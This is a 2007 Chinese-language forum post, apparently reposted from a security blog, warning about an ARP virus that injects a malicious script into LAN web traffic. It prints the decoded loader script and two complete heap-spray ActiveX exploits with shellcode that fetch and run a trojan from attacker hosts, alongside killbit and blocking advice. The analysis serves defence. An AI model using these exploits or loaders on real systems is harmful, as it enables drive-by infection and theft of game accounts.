廣告廣告
  加入我的最愛 設為首頁 風格修改
首頁 首尾
 手機版   訂閱   地圖  簡體 
您是第 1962 個閱讀者
 
發表文章 發表投票 回覆文章
  可列印版   加為IE收藏   收藏主題   上一主題 | 下一主題   
upside 手機 葫蘆墩家族
個人頭像
個人文章 個人相簿 個人日記 個人地圖
特殊貢獻獎 社區建設獎 優秀管理員勳章
頭銜:反病毒 反詐騙 反虐犬   反病毒 反詐騙 反虐犬  
版主
分享: 轉寄此文章 Facebook Plurk Twitter 複製連結到剪貼簿 轉換為繁體 轉換為簡體 載入圖片
推文 x0
[病毒蠕蟲] ARP病毒攜新應用軟件漏洞
ARP病毒攜新應用軟件漏洞
病毒預警:ARP病毒攜新應用軟件漏洞(聯衆遊戲、超星閱讀器 0-Day)大肆傳播

近期,根據惡意代碼檢測,有一新的ARP病毒變種,利用新的應用軟件漏洞(聯衆遊戲了聊天室組件、超星閱讀器0-Day)大肆傳播,造成內網斷網,帳號丟失。

該新ARP病毒變種,通過感染局域網中一台後,會將該電腦僞裝成網關,這樣局域網中其它電腦在浏覽網頁的時候,其返回的WEB頁面中插入惡意網址連接:<script src=http://rb.vg/1.js></script> ,該惡意網址連接利用多個時下流行的網頁木馬漏洞,下載多款網遊木馬,這樣導致中毒用戶帳號丟失,遭受到損失。


圖:ARP病毒插入的惡意代碼框架

詳細分析如下:

惡意網址連接:<script src=http://rb.vg/1.js></script> 采用的是js文件挂馬法,該文件采用16進制代碼加密,解密後的代碼如下:

/*----------------------------------------------------

var vDA1 = new window["Date"]()
vDA1["setTime"](vDA1["getTime"]() + 24*60*60*1000)
var eOTo$2 = new window["String"](window["document"]["cookie"])
var eZT3 = "Cookie1="
var VMliYvVKu4 = eOTo$2["indexOf"](eZT3)
if (VMliYvVKu4 == -1)
{
window["document"]["cookie"] = "Cookie1=POPWINDOS;expires="+ vDA1["toGMTString"]()

try{if(new ActiveXObject("Microsoft.XMLHTTP"))window["document"]["write"]('<script src="http://nop.gs/s3...Js1.js"></script>');}catch(e){} // ms06014

try{if(new ActiveXObject("DPClient.Vod"))window["document"]["write"]('<iframe style=display:none src="http://nop.gs/s36...ok.gif"></iframe>');}catch(e){} // XL

try{if(new ActiveXObject("MPS.StormPlayer.1"))window["document"]["write"]('<iframe style=display:none src="http://nop.gs/s3...68.gif"></iframe>');}catch(e){} // BF

try{if(new ActiveXObject("POWERPLAYER.PowerPlayerCtrl.1"))window["document"]["write"]('<iframe style=display:none src="http://nop.gs/s3...8.gif"></iframe>');}catch(e){} // PPS

try{if(new ActiveXObject("Pdg2"))window["document"]["write"]('<iframe style=display:none src="http://nop.gs/s368...368.gif"></iframe>');}catch(e){} // CX

try{if(new ActiveXObject("GLCHAT.GLChatCtrl.1"))window["document"]["write"]('<iframe style=display:none src="http://nop.gs/s36...68.gif"></iframe>');}catch(e){} // LZ

try{if(new ActiveXObject("BaiduBar.Tool.1"))window["document"]["write"]('<iframe style=display:none src="http://nop.gs/s36...68.gif"></iframe>');}catch(e){} // Baidu

}

/*----------------------------------------------------

在該代碼中,共利用以下7個漏洞下載木馬病毒http://pic.16.vg/S...82.exe

ms06014 /經典的MS06-014挂馬王漏洞

XL /迅雷5漏洞

BF /暴風影音漏洞

PPS /PPStream 漏洞

CX /超星閱讀器漏洞 0-Day

LZ /聯衆遊戲聊天室組件漏洞

Baidu /百度搜霸漏洞

下面說一下聯衆遊戲聊天室組件漏洞和超星閱讀器漏洞(0-Day) ,

http://nop.gs/s36...68.gif 是聯衆遊戲聊天室組件的溢出代碼,采用US-ASCii 加密,解密後的Exploits代碼如下:

/**************************************************************************************************

<body>
<script>window.onerror=function(){return true;}</script>
<object classid="clsid:AE93C5DF-A990-11D1-AEBD-5254ABDD2B69" style='display:none' id='target'></object>
<SCRIPT language="javascript">
var shellcode = unescape(""+""+""+"%u9090"+""+""+""+"%u9090"+
""+""+""+"%uefe9"+""+""+"%u0000"+""+""+"%u5a00"+""+""+"%ua164"+""+""+"%u0030"+""+""+"%u0000"+""+""+"%u408b"+""+""+"%u8b0c" +
""+""+""+"%u1c70"+""+""+"%u8bad"+""+""+"%u0840"+""+""+"%ud88b"+""+""+"%u738b"+""+""+"%u8b3c"+""+""+"%u1e74"+""+""+"%u0378" +
""+""+""+"%u8bf3"+""+""+"%u207e"+""+""+"%ufb03"+""+""+"%u4e8b"+""+""+"%u3314"+""+""+"%u56ed"+""+""+"%u5157"+""+""+"%u3f8b" +
""+""+""+"%ufb03"+""+""+"%uf28b"+""+""+"%u0e6a"+""+""+"%uf359"+""+""+"%u74a6"+""+""+"%u5908"+""+""+"%u835f"+""+""+"%u04c7" +
""+""+""+"%ue245"+""+""+"%u59e9"+""+""+"%u5e5f"+""+""+"%ucd8b"+""+""+"%u468b"+""+""+"%u0324"+""+""+"%ud1c3"+""+""+"%u03e1" +
""+""+""+"%u33c1"+""+""+"%u66c9"+""+""+"%u088b"+""+""+"%u468b"+""+""+"%u031c"+""+""+"%uc1c3"+""+""+"%u02e1"+""+""+"%uc103" +
""+""+""+"%u008b%uc303"+""+""+"%ufa8b"+""+""+"%uf78b"+""+""+"%uc683"+""+""+"%u8b0e"+""+""+"%u6ad0"+""+""+"%u5904" +
""+""+""+"%u6ae8"+""+""+"%u0000"+""+""+"%u8300"+""+""+"%u0dc6"+""+""+"%u5652"+""+""+"%u57ff"+""+""+"%u5afc"+""+""+"%ud88b" +
""+""+""+"%u016a"+""+""+"%ue859"+""+""+"%u0057"+""+""+"%u0000"+""+""+"%uc683"+""+""+"%u5613"+""+""+"%u8046"+""+""+"%u803e" +
""+""+""+"%ufa75"+""+""+"%u3680"+""+""+"%u5e80"+""+""+"%uec83"+""+""+"%u8b40"+""+""+"%uc7dc"+""+""+"%u6303"+""+""+"%u646d" +
""+""+""+"%u4320"+""+""+"%u4343"+""+""+"%u6643"+""+""+"%u03c7"+""+""+"%u632f"+""+""+"%u4343"+""+""+"%u03c6"+""+""+"%u4320" +
""+""+""+"%u206a"+""+""+"%uff53"+""+""+"%uec57"+""+""+"%u04c7"+""+""+"%u5c03"+""+""+"%u2e61"+""+""+"%uc765"+""+""+"%u0344" +
""+""+""+"%u7804"+""+""+"%u0065"+""+""+"%u3300"+""+""+"%u50c0"+""+""+"%u5350"+""+""+"%u5056"+""+""+"%u57ff"+""+""+"%u8bfc" +
""+""+""+"%u6adc"+""+""+"%u5300%u57ff"+""+""+"%u68f0"+""+""+"%u2451"+""+""+"%u0040"+""+""+"%uff58"+""+""+"%u33d0" +
""+""+""+"%uacc0"+""+""+"%uc085"+""+""+"%uf975"+""+""+"%u5251"+""+""+"%u5356"+""+""+"%ud2ff"+""+""+"%u595a"+""+""+"%ue2ab" +
""+""+""+"%u33ee"+""+""+"%uc3c0"+""+""+"%u0ce8"+""+""+"%uffff"+""+""+"%u47ff"+""+""+"%u7465"+""+""+"%u7250"+""+""+"%u636f" +
""+""+""+"%u6441"+""+""+"%u7264"+""+""+"%u7365"+""+""+"%u0073"+""+""+"%u6547"+""+""+"%u5374"+""+""+"%u7379"+""+""+"%u6574" +
""+""+""+"%u446d"+""+""+"%u7269"+""+""+"%u6365"+""+""+"%u6f74"+""+""+"%u7972"+""+""+"%u0041"+""+""+"%u6957"+""+""+"%u456e" +
""+""+""+"%u6578"+""+""+"%u0063"+""+""+"%u7845"+""+""+"%u7469"+""+""+"%u6854"+""+""+"%u6572"+""+""+"%u6461"+""+""+"%u4c00" +
""+""+""+"%u616f"+""+""+"%u4c64"+""+""+"%u6269"+""+""+"%u6172%u7972"+""+""+"%u0041"+""+""+"%u7275"+""+""+"%u6d6c" +
""+""+""+"%u6e6f"+""+""+"%u5500"+""+""+"%u4c52"+""+""+"%u6f44"+""+""+"%u6e77"+""+""+"%u6f6c"+""+""+"%u6461"+""+""+"%u6f54" +
""+""+""+"%u6946"+""+""+"%u656c"+""+""+"%u0041"+""+""+"%u7468"+""+""+"%u7074"+""+""+"%u2f3a"+""+""+"%u702f"+""+""+"%u6369" +
""+""+""+"%u312e%u2e36"+""+""+"%u6776"+""+""+"%u532f"+""+""+"%u3633"+""+""+"%u2f38"+""+""+"%u3353"+""+""+"%u3836" +
""+""+""+"%u2e32"+""+""+"%u7865"+""+""+"%u8065"+""+""+"%u0000");
</script>
<SCRIPT language="javascript">
var fsk51d2sl = "63e23c122";
var bigblock = unescape(""+""+"%u9090"+""+"%u9090");
var fsk51d2sl = "63e23c122";
var headersize = 20;
var fsk51d2sl = "63e23c122";
var slackspace = headersize+shellcode.length;
var fsk51d2sl = "63e23c122";
while (bigblock.length<slackspace) bigblock+=bigblock;
var fsk51d2sl = "63e23c122";
fillblock = bigblock.substring(0, slackspace);
var fsk51d2sl = "63e23c122";
block = bigblock.substring(0, bigblock.length-slackspace);
var fsk51d2sl = "63e23c122";
while(block.length+slackspace<0x40000) block = block+block+fillblock;
var fsk51d2sl = "63e23c122";
memory = new Array();
var fsk51d2sl = "63e23c122";
for (x=0; x<300; x++) memory[x] = block +shellcode;
var fsk51d2sl = "63e23c122";
var buffer = ''
var fsk51d2sl = "63e23c122";
while (buffer.length < 164) buffer+="A";
var fsk51d2sl = "63e23c122";
buffer=buffer+"\x0a\x0a\x0a\x0a"+buffer;
var fsk51d2sl = "63e23c122";
ok="ok";
var fsk51d2sl = "63e23c122";
target.ConnectAndEnterRoom(buffer,ok,ok,ok,ok,ok );
var fsk51d2sl = "63e23c122";
</script?
</body>
<mEtA Http-Equiv="Content-TypE" content="TeXt/htMl; CharSet=Us-AsCiI" />

/**************************************************************************************************

有漏洞的組件爲:C:\Program Files\GlobalLink\Game\Share\GLChat.ocx, GlobalLink

其 CLSID:AE93C5DF-A990-11D1-AEBD-5254ABDD2B69

下載的病毒爲: http://pic.16.vg/S...82.exe

超星閱讀器的Exploits代碼如下,這個看樣子現在還是個0-Day

/**************************************************************************************************

<body>
<script>window.onerror=function(){return true;}</script>
<object classid="clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2" style='display:none' id='target'></object>
<SCRIPT language="javascript">
var el1s2kdo3r = "hi1265369";
var shellcode = unescape(""+""+""+"%u9090"+""+""+""+"%u9090"+
""+""+""+"%uefe9"+""+""+"%u0000"+""+""+"%u5a00"+""+""+"%ua164"+""+""+"%u0030"+""+""+"%u0000"+""+""+"%u408b"+""+""+"%u8b0c" +
""+""+""+"%u1c70"+""+""+"%u8bad"+""+""+"%u0840"+""+""+"%ud88b"+""+""+"%u738b"+""+""+"%u8b3c"+""+""+"%u1e74"+""+""+"%u0378" +
""+""+""+"%u8bf3"+""+""+"%u207e%ufb03"+""+""+"%u4e8b%u3314"+""+""+"%u56ed"+""+""+"%u5157"+""+""+"%u3f8b" +
""+""+""+"%ufb03"+""+""+"%uf28b"+""+""+"%u0e6a"+""+""+"%uf359"+""+""+"%u74a6"+""+""+"%u5908"+""+""+"%u835f"+""+""+"%u04c7" +
""+""+""+"%ue245"+""+""+"%u59e9"+""+""+"%u5e5f"+""+""+"%ucd8b"+""+""+"%u468b"+""+""+"%u0324"+""+""+"%ud1c3"+""+""+"%u03e1" +
""+""+""+"%u33c1"+""+""+"%u66c9%u088b"+""+""+"%u468b"+""+""+"%u031c"+""+""+"%uc1c3"+""+""+"%u02e1"+""+""+"%uc103" +
""+""+""+"%u008b"+""+""+"%uc303"+""+""+"%ufa8b"+""+""+"%uf78b"+""+""+"%uc683"+""+""+"%u8b0e"+""+""+"%u6ad0"+""+""+"%u5904" +
""+""+""+"%u6ae8"+""+""+"%u0000"+""+""+"%u8300%u0dc6"+""+""+"%u5652"+""+""+"%u57ff"+""+""+"%u5afc"+""+""+"%ud88b" +
""+""+""+"%u016a"+""+""+"%ue859"+""+""+"%u0057"+""+""+"%u0000"+""+""+"%uc683"+""+""+"%u5613"+""+""+"%u8046"+""+""+"%u803e" +
""+""+""+"%ufa75"+""+""+"%u3680"+""+""+"%u5e80"+""+""+"%uec83"+""+""+"%u8b40"+""+""+"%uc7dc"+""+""+"%u6303"+""+""+"%u646d" +
""+""+""+"%u4320"+""+""+"%u4343%u6643"+""+""+"%u03c7"+""+""+"%u632f"+""+""+"%u4343"+""+""+"%u03c6"+""+""+"%u4320" +
""+""+""+"%u206a"+""+""+"%uff53"+""+""+"%uec57"+""+""+"%u04c7"+""+""+"%u5c03"+""+""+"%u2e61"+""+""+"%uc765"+""+""+"%u0344" +
""+""+""+"%u7804%u0065"+""+""+"%u3300"+""+""+"%u50c0"+""+""+"%u5350"+""+""+"%u5056"+""+""+"%u57ff"+""+""+"%u8bfc" +
""+""+""+"%u6adc"+""+""+"%u5300"+""+""+"%u57ff"+""+""+"%u68f0"+""+""+"%u2451"+""+""+"%u0040"+""+""+"%uff58"+""+""+"%u33d0" +
""+""+""+"%uacc0"+""+""+"%uc085"+""+""+"%uf975"+""+""+"%u5251%u5356"+""+""+"%ud2ff"+""+""+"%u595a"+""+""+"%ue2ab" +
""+""+""+"%u33ee"+""+""+"%uc3c0"+""+""+"%u0ce8"+""+""+"%uffff"+""+""+"%u47ff"+""+""+"%u7465"+""+""+"%u7250"+""+""+"%u636f" +
""+""+""+"%u6441"+""+""+"%u7264"+""+""+"%u7365"+""+""+"%u0073"+""+""+"%u6547"+""+""+"%u5374"+""+""+"%u7379"+""+""+"%u6574" +
""+""+""+"%u446d"+""+""+"%u7269"+""+""+"%u6365"+""+""+"%u6f74"+""+""+"%u7972"+""+""+"%u0041"+""+""+"%u6957"+""+""+"%u456e" +
""+""+""+"%u6578%u0063"+""+""+"%u7845"+""+""+"%u7469"+""+""+"%u6854"+""+""+"%u6572"+""+""+"%u6461"+""+""+"%u4c00" +
""+""+""+"%u616f"+""+""+"%u4c64"+""+""+"%u6269"+""+""+"%u6172"+""+""+"%u7972"+""+""+"%u0041"+""+""+"%u7275"+""+""+"%u6d6c" +
""+""+""+"%u6e6f"+""+""+"%u5500"+""+""+"%u4c52"+""+""+"%u6f44"+""+""+"%u6e77"+""+""+"%u6f6c"+""+""+"%u6461"+""+""+"%u6f54" +
""+""+""+"%u6946"+""+""+"%u656c"+""+""+"%u0041%u7468"+""+""+"%u7074"+""+""+"%u2f3a"+""+""+"%u702f"+""+""+"%u6369" +
""+""+""+"%u312e%u2e36"+""+""+"%u6776"+""+""+"%u532f"+""+""+"%u3633%u2f38"+""+""+"%u3353"+""+""+"%u3836" +
""+""+""+"%u2e32"+""+""+"%u7865"+""+""+"%u8065"+""+""+"%u0000");
</script>
<SCRIPT language="javascript">
var el1s2kdo3r = "hi1265369";
var bigblock = unescape(""+""+""+"%u9090"+""+""+"%u9090");
var el1s2kdo3r = "hi1265369";
var headersize = 20;
var el1s2kdo3r = "hi1265369";
var slackspace = headersize+shellcode.length;
var el1s2kdo3r = "hi1265369";
while (bigblock.length<slackspace) bigblock+=bigblock;
var el1s2kdo3r = "hi1265369";
fillblock = bigblock.substring(0, slackspace);
var el1s2kdo3r = "hi1265369";
block = bigblock.substring(0, bigblock.length-slackspace);
var el1s2kdo3r = "hi1265369";
while(block.length+slackspace<0x40000) block = block+block+fillblock;
var el1s2kdo3r = "hi1265369";
memory = new Array();
var el1s2kdo3r = "hi1265369";
for (x=0; x<100; x++) memory[x] = block +shellcode;
var el1s2kdo3r = "hi1265369";
var buffer = ''
var el1s2kdo3r = "hi1265369";
while (buffer.length < 1024) buffer+="\x05";
var el1s2kdo3r = "hi1265369";
var ok="1111";
var el1s2kdo3r = "hi1265369";
target.Register(ok,buffer);
var el1s2kdo3r = "hi1265369";
</script?
</body>
<mEtA Http-Equiv="Content-TypE" content="TeXt/htMl; CharSet=Us-AsCiI" />

/**************************************************************************************************

有漏洞的組件爲:C:\WINDOWS\system32\pdg2.dll

其CLSID:7F5E27CE-4A5C-11D3-9232-0000B48A05B2

下載的病毒同上個一樣。

這回就連超星閱讀器漏洞就被病毒作者利用上了,令我很是汗了一把~

請網管封殺 http://pic....vg/ 惡意網址,並將這些應用軟件升級到最新版。

對於官方還沒更新軟件的0-Day漏洞,可以在注冊表中設置killbit :

如超星閱讀器的: 從最開始的MS06-014和MS07-017雙漏洞挂馬,到後來又加上了WEB迅雷漏洞三挂馬法,再到時下十分流行的N個應用軟件漏洞挂馬,可見病毒作者爲了將自己的馬兒放出去,已經無所不用其極,下一個遭殃的軟件會是那個呢?

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{7F5E27CE-4A5C-11D3-9232-0000B48A05B2}]
"Compatibility Flags"=dword:00000400

近期網馬漏洞不完全總結

百度搜霸ActiveX控件遠程代碼執行漏洞

PPStream 堆棧溢出漏洞

暴風影音2 mps.dll組件多個緩沖區溢出漏洞

jetAudio 7.x ActiveX漏洞

WEB迅雷漏洞

迅雷5漏洞

Yahoo! Messenger 8.1.0 ActiveX控件GetFile方式任意文件上傳漏洞

超星閱讀器漏洞

聯衆遊戲聊天室組件漏洞

From:網絡巡警的博客



爸爸 你一路好走
獻花 x0 回到頂端 [樓 主] From:臺灣和信超媒體寬帶網 | Posted:2007-10-26 01:50 |
super老師 手機
數位造型
個人文章 個人相簿 個人日記 個人地圖
小人物
級別: 小人物 該用戶目前不上站
推文 x0 鮮花 x14
分享: 轉寄此文章 Facebook Plurk Twitter 複製連結到剪貼簿 轉換為繁體 轉換為簡體 載入圖片

現在網路病毒大多已能被防毒軟體所偵測, 危險的是這些木馬 蠕蟲程式....
藏在網頁的html當中, 讓人防無可防, 大家可要小心瀏覽網站,
並建議使用FireFox 2.x (介面比IE7 友善多了),
加強網站瀏覽的安全性


只要相信 , 就能找到幸福
正面思考 , 天天快樂生活
推薦是發表好文的原動力
獻花 x0 回到頂端 [1 樓] From:臺灣 | Posted:2007-10-26 07:56 |

首頁  發表文章 發表投票 回覆文章
Powered by PHPWind v1.3.6
Copyright © 2003-04 PHPWind
Processed in 0.117879 second(s),query:16 Gzip disabled
本站由 瀛睿律師事務所 擔任常年法律顧問 | 免責聲明 | 本網站已依台灣網站內容分級規定處理 | 連絡我們 | 訪客留言